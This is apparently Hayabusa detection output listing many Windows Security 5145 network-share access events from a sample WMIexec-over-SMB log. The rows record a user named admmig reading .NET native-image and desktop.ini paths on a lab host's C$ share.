2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
